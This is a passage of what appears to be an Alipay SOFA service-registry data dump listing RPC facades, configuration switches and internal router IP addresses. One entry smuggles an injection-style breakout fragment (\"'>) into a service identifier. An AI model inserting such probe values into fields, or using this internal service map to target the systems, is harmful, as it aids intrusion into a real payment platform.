bleschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_investment_normal.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.darwin:name=com.alipay.darwin.sdk.config.oss.secretAccessKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbprod.common.service.facade.plan.PreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cardbin.common.service.facade.CardNoGeneratorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cswork.facade.permission.api.ZarkResourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.190.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:tradequeryhis@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.PcreditPollenAmountPraiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.51.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.core.service.reindeer.SceneManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.248.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.16.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.SkynetDrmSwitch.onlinePgmServiceUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.merchant.TechnicalTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.122.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:addMemberCardLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ClientPerfDataFromMydrillService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.240.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.recadmin.common.service.facade.AirAutoFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ccmfactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mwalletmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_ALIFI_NEW_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.hainaprod.common.service.facade.api.actrule.ActRuleEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.CompensationQueryService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.131.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.OperatorService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.biz.service.dataset.sqlimport.SqlToViewGenerator:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.api.ApiInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.bkmportal.BkmportalProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smcp.facade.tuanyuan.TyMockMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.adapter.crypt.CaCryptUtil:1.0:externCaCryptUtil@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sts.core.model.thread.ThreadEventListenner:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_G_MAIL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.riskmind.common.service.facade.api.RiskMindQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdminRequireManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.budgetMaxPublishRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.ClearingFileGenerateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntBatchHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.TelPhoneInfoServiceForMail:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodelcore.common.service.facade.api.DataSyncChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:igfas.fundapply@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeProcessQueryFacade:1.0:tradequeryprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.70.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdatadecision.common.service.facade.mng.MngDbFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.IndustryPartnerAuthInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_NAPOLI_alifi-cn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.discount.core.model.repository.CampRelateSubjectDetailRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imerchantsettle.common.service.facade.api.MerchantSettleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardCreateAndPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.erecon.common.service.facade.query.api.ErcReconCodeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BAITIAO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_cloudFunds_isvAdd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:dassmeta-DmPublicProcessTaskCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.stop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.apacc.common.service.facade.module.ModuleActionEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.AsynTaskSendManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.generalorder.OrderExtendSpi:1.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.schedulerweb.service.facade.operate.TaskOperateFacade:1.0:ischedulerweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.auth.api.AuthUserCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MerchantAccountCancelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.dandan.facade.EmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.zoloz.zhub.device.IoTDeviceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergwsmall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.pam.PamNamelistQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundTradeRefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.charge.addp_tddl_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecCityConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:uiomng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.MocKbOrderCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.bankcard.facade.UsageQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.lmb.facade.LMBAssetStatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.recommendafterpay.MiniAppRecommendedAfterPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcinspect.facade.task.TaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.itscenter.common.service.facade.DataSyncFacade:1.0:itscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.apppackage.PackageAdminManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.message.api.ChatMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemRCallService:1.0:pcreditcoop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.mng.EbillDataCollectInstConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.130.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openUniformProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.ReCorePropertiesServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mdeduct@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tag.ItemTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.AssetProfitAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.citygroup.CityGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopBusinessInfoValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:dtbank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.cat.facade.CatBizService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fploanmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ins.policy.service.facade.InnerEfficiencyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessFlowAccessor:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.merchandise.ShelfOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.query.CfpPendingReportQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.news.NewsDetailQueryV30Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbompSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.qaZQueue50#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_redeem_sys_retry.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctransquery.common.service.facade.api.FinFreezeLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.128.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinpromo.common.service.facade.gold.PigRunningUserPrizeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mockportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.SceneAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.TmallTaskModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.api.TransferReserveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.228.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:magnus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.process.facade.AssetBpInstanceProccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.gmp.openplatform.facade.SaasLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.92.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.operator.common.service.facade.OperatorPasswordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.moneyfund.facade.query.MFundAccountQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fintabcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.29.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mychain.baas.common.user.service.FeatureApplyRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findefencecore.common.service.script.api.ScriptTreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_DATA-WAREHOUSE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_MFINBASEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.tinyapp.MstTinyappReportDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_USER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:quotexchangesofa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.apis.ProblemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.api.InstantFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.stock.VcpVoucherStockQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CloudCategoryExpansionManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchservbase.biz.service.mrchlevel.facade.MrchlevelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KBPRIZEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.HotspotHistoryMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.FrontRepositoryUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.deepInsight.DeepInsightAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:mpsservicegdbak@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.hedge.HedgePhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FILEFACTORY#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundtrade.common.service.facade.api.FundDebtCollectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:reservecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.176.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_MFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_RISKQ#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.queryMerchant,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_TEST-MODEL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:scardcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_CLIVECENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-fundprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iprocess.sip.action.Action:1.0:executeTaskEndAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alcorporation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.facade.InstCryptFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.suiteide.common.service.facade.api.SuiteTemplateMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeMfinpromoReqPidStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.persona.PersonaQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.report.DeferredReportQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.service.governance.facade.ServiceDefinitionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.article.facade.ArticleCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.gov.common.facade.api.TdcVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.datasource.OdpsTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobilecashier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.identify.IdentifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_RISK_RESULT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.metadatacenter.facade.api.RiskItemRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.159.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.fundCodeQueryApi,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.45.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.finstore.CaifuhaoMenuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditplan.common.prod.settlement.PcreditPlanSettlementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.reindeer.TemplateConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.FintradeConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.smartant.SmartAntUserAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.UserGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.200.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.custdecision.service.questionnaire.QuestionnaireMetaInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeFundPositionDetailInstsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcore.common.service.facade.operator.OperatorQueryForClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.igdmc.biz.service.LocalDataMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dsoc.service.facade.api.deployorder.VerifyResultFeedbackService:1.0:xiaokang1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.zim.CapturePicturePreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.supportNettingStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.kmi.common.service.facade.KeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.PatchValidateDrmResourceTrigger.supportFidsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.edeductcenter.common.service.facade.EdeductProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataservice.common.service.facade.FinoutfluxQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.maxBurstSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mrchprod.common.service.facade.merchant.MrchProdZFTSubMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"'>@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opsware.api.facade.ops.VMServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundcardprod.common.service.virtual.facade.VirtualCardManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.service.HiNetCardAggFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.product.spi.ValidateProductBuildService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.supergw.service.facade.transaction.UidGeneratorSwitch.useRandomUid,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.tinyAppHotBadgeThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lightmds.service.mds.MdsDatasetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.SingleCollectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointQuotaConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.f